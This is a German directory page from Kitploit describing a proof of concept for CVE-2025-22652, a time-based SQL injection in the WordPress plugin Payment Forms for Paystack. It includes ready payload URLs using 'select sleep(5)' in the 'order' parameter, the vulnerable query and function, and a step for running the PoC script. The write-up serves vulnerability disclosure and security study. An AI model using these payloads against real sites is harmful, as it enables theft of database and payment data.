Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-22652 — PoC zu CVE-2025-22652 | Kitploit
Tools/GitHubGitHub/dottak/cve-2025-22652
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdottak/cve-2025-22652

CVE-2025-22652

PoC zu CVE-2025-22652

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-22652

1️⃣ Komponententyp

WordPress-Plugin

2️⃣ Komponenten-Details

Component name Payment Forms for Paystack

Vulnerable version <= 4.0.1

Component slug payment-forms-for-paystack

Component link https://wordpress.org/plugins/payment-forms-for-paystack/

3️⃣ OWASP 2017: TOP 10

Vulnerability class A3: Injection

Vulnerability type SQL Injection

4️⃣ Voraussetzung

Administrator

5️⃣ Schwachstellendetails

👉 Kurzbeschreibung

Im Plugin Payment Forms for Paystack, Version 4.0.1 und niedriger, besteht eine SQL-Injection-Schwachstelle aufgrund unzureichender Eingabevalidierung und Escape-Verarbeitung des URL-Parameters order beim Betrachten der Zahlungsliste in Zahlungsformularen. Dadurch kann ein Angreifer mit Administratorrechten alle Informationen aus der Datenbank der Zielseite extrahieren.

Obwohl diese Schwachstelle keine direkten Datenabfragen erlaubt, können Daten mittels zeitbasierter SQL-Injection-Techniken extrahiert werden.

👉 Reproduktionsschritte (PoC)

  1. Bereiten Sie eine WordPress-Seite mit installiertem Plugin Payment Forms for Paystack, Version 4.0.1 oder niedriger, vor.

  2. Da Sie ein Paystack-Formular hinzufügen müssen, um die Abfrage durchzuführen, fügen Sie ein Formular über das Menü zum Hinzufügen von Paystack-Formularen hinzu (wp-admin/post-new.php?post_type=paystack_form).

    image

  3. Nach dem Hinzufügen des Formulars können Sie den ShortCode überprüfen und die Attribut-ID dieses ShortCodes in den URL-Parameter form in der folgenden URL einfügen, bevor Sie darauf zugreifen.

    root@kitploit:~
    http://localhost:8080/wp-admin/edit.php?post_type=paystack_form&page=submissions&form=<Insertion Point>&orderby=&order=,+(select+sleep(5)+from+dual+where+1=1)
    

    Lautet der ShortCode beispielsweise [pff-paystack id="13"], greifen Sie auf http://localhost:8080/wp-admin/edit.php?post_type=paystack_form&page=submissions&form=13&orderby=&order=,+(select+sleep(5)+from+dual+where+1=1) zu.

    image

  4. Da die Bedingungsklausel where 1=1 im SQL-Injection-Payload, das in den URL-Parameter order eingefügt wurde, stets wahr ist, können Sie bestätigen, dass die Funktion ausgeführt wird und die Antwort nach 5 Sekunden eintrifft.

👉 Zusätzliche Informationen (optional)

[Ursache der Schwachstelle]

Bei der Anfrage an die URL, in der die Schwachstelle auftritt, wird die Funktion get_payments_by_id in der Datei /wp-content/plugins/payment-forms-for-paystack/includes/classes/class-helpers.php aufgerufen.

An dieser Stelle wird der URL-Parameter order direkt in die SQL-Abfrage eingefügt und ohne jegliche Eingabevalidierung oder Escape-Verarbeitung in der Datenbank ausgeführt.

image

Daher wird bei Einfügung des SQL-Injection-Payloads , (select sleep(5) from dual where 1=1) in den URL-Parameter order die unten gezeigte SQL-Abfrage ausgeführt. Dabei gibt es je nach Wahrheitswert der Bedingungsklausel im Payload einen Unterschied in der Antwortzeit, und dieser Zeitunterschied kann zur Extraktion von Daten aus der Datenbank genutzt werden.

root@kitploit:~
SELECT * FROM %i WHERE post_id = %d AND paid = %s ORDER BY %i , (select sleep(5) from dual where 1=1)

[Implementierung und Ausführung des PoC-Codes]

  1. Öffnen Sie den PoC-Code in einem Editor und geben Sie die WordPress-Seitenadresse sowie die Administrator-Anmeldedaten ein.

    image

    1. Geben Sie dann den folgenden Befehl ein, um den PoC-Code auszuführen.

    Required module requests

    root@kitploit:~
    python poc.py
    

    image

6️⃣ Exploit-Demo

video

7️⃣ Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2025-22652
Tool herunterladen
sleep(5)

image

  • Ändert man dagegen die Bedingungsklausel im SQL-Injection-Payload, das in order eingefügt wurde, auf where 1=2, kann man bestätigen, dass die Antwort sofort eintrifft.

    root@kitploit:~
    http://localhost:8080/wp-admin/edit.php?post_type=paystack_form&page=submissions&form=<Insertion Point>&orderby=&order=,+(select+sleep(5)+from+dual+where+1=2)
    

    Lautet der ShortCode beispielsweise [pff-paystack id="13"], greifen Sie auf http://localhost:8080/wp-admin/edit.php?post_type=paystack_form&page=submissions&form=13&orderby=&order=,+(select+sleep(5)+from+dual+where+1=2) zu.

    image